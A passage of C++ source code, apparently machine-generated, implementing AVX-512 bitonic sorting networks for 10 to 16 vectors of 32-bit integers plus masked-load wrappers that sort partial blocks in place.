d08); sort_02v_descending(d09, d10); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_02v_merge_ascending(d09, d10); } static INLINE void sort_10v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_02v_ascending(d09, d10); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_02v_merge_descending(d09, d10); } static INLINE void sort_11v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_descending(d09, d10, d11); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_merge_ascending(d09, d10, d11); } static INLINE void sort_11v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_ascending(d09, d10, d11); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_03v_merge_descending(d09, d10, d11); } static NOINLINE void sort_12v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_descending(d09, d10, d11, d12); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_merge_ascending(d09, d10, d11, d12); } static NOINLINE void sort_12v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_ascending(d09, d10, d11, d12); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_04v_merge_descending(d09, d10, d11, d12); } static INLINE void sort_13v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_descending(d09, d10, d11, d12, d13); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_merge_ascending(d09, d10, d11, d12, d13); } static INLINE void sort_13v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_ascending(d09, d10, d11, d12, d13); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_05v_merge_descending(d09, d10, d11, d12, d13); } static INLINE void sort_14v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_06v_descending(d09, d10, d11, d12, d13, d14); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_06v_merge_ascending(d09, d10, d11, d12, d13, d14); } static INLINE void sort_14v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_06v_ascending(d09, d10, d11, d12, d13, d14); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_06v_merge_descending(d09, d10, d11, d12, d13, d14); } static INLINE void sort_15v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_descending(d09, d10, d11, d12, d13, d14, d15); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_merge_ascending(d09, d10, d11, d12, d13, d14, d15); } static INLINE void sort_15v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_ascending(d09, d10, d11, d12, d13, d14, d15); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_07v_merge_descending(d09, d10, d11, d12, d13, d14, d15); } static NOINLINE void sort_16v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15, __m512i& d16) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_descending(d09, d10, d11, d12, d13, d14, d15, d16); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); tmp = d16; d16 = _mm512_max_epi32(d01, d16); d01 = _mm512_min_epi32(d01, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_merge_ascending(d09, d10, d11, d12, d13, d14, d15, d16); } static NOINLINE void sort_16v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10, __m512i& d11, __m512i& d12, __m512i& d13, __m512i& d14, __m512i& d15, __m512i& d16) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_ascending(d09, d10, d11, d12, d13, d14, d15, d16); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); tmp = d10; d10 = _mm512_max_epi32(d07, d10); d07 = _mm512_min_epi32(d07, tmp); tmp = d11; d11 = _mm512_max_epi32(d06, d11); d06 = _mm512_min_epi32(d06, tmp); tmp = d12; d12 = _mm512_max_epi32(d05, d12); d05 = _mm512_min_epi32(d05, tmp); tmp = d13; d13 = _mm512_max_epi32(d04, d13); d04 = _mm512_min_epi32(d04, tmp); tmp = d14; d14 = _mm512_max_epi32(d03, d14); d03 = _mm512_min_epi32(d03, tmp); tmp = d15; d15 = _mm512_max_epi32(d02, d15); d02 = _mm512_min_epi32(d02, tmp); tmp = d16; d16 = _mm512_max_epi32(d01, d16); d01 = _mm512_min_epi32(d01, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_08v_merge_descending(d09, d10, d11, d12, d13, d14, d15, d16); } static NOINLINE void sort_01v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 0)); sort_01v_ascending(d01); _mm512_mask_storeu_epi32((__m512i *) ptr + 0, mask, d01); } static NOINLINE void sort_02v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 1)); sort_02v_ascending(d01, d02); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_mask_storeu_epi32((__m512i *) ptr + 1, mask, d02); } static NOINLINE void sort_03v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 2)); sort_03v_ascending(d01, d02, d03); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_mask_storeu_epi32((__m512i *) ptr + 2, mask, d03); } static NOINLINE void sort_04v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 3)); sort_04v_ascending(d01, d02, d03, d04); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_mask_storeu_epi32((__m512i *) ptr + 3, mask, d04); } static NOINLINE void sort_05v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 4)); sort_05v_ascending(d01, d02, d03, d04, d05); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_mask_storeu_epi32((__m512i *) ptr + 4, mask, d05); } static NOINLINE void sort_06v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 5)); sort_06v_ascending(d01, d02, d03, d04, d05, d06); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_mask_storeu_epi32((__m512i *) ptr + 5, mask, d06); } static NOINLINE void sort_07v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 6)); sort_07v_ascending(d01, d02, d03, d04, d05, d06, d07); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_mask_storeu_epi32((__m512i *) ptr + 6, mask, d07); } static NOINLINE void sort_08v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 7)); sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_mask_storeu_epi32((__m512i *) ptr + 7, mask, d08); } static NOINLINE void sort_09v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 8)); sort_09v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_mask_storeu_epi32((__m512i *) ptr + 8, mask, d09); } static NOINLINE void sort_10v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 9)); sort_10v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_mask_storeu_epi32((__m512i *) ptr + 9, mask, d10); } static NOINLINE void sort_11v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 10)); sort_11v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_mask_storeu_epi32((__m512i *) ptr + 10, mask, d11); } static NOINLINE void sort_12v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 11)); sort_12v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_mask_storeu_epi32((__m512i *) ptr + 11, mask, d12); } static NOINLINE void sort_13v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 12)); sort_13v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, d13); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_mask_storeu_epi32((__m512i *) ptr + 12, mask, d13); } static NOINLINE void sort_14v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_loadu_si512((__m512i const *) ptr + 12);; __m512i d14 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 13)); sort_14v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, 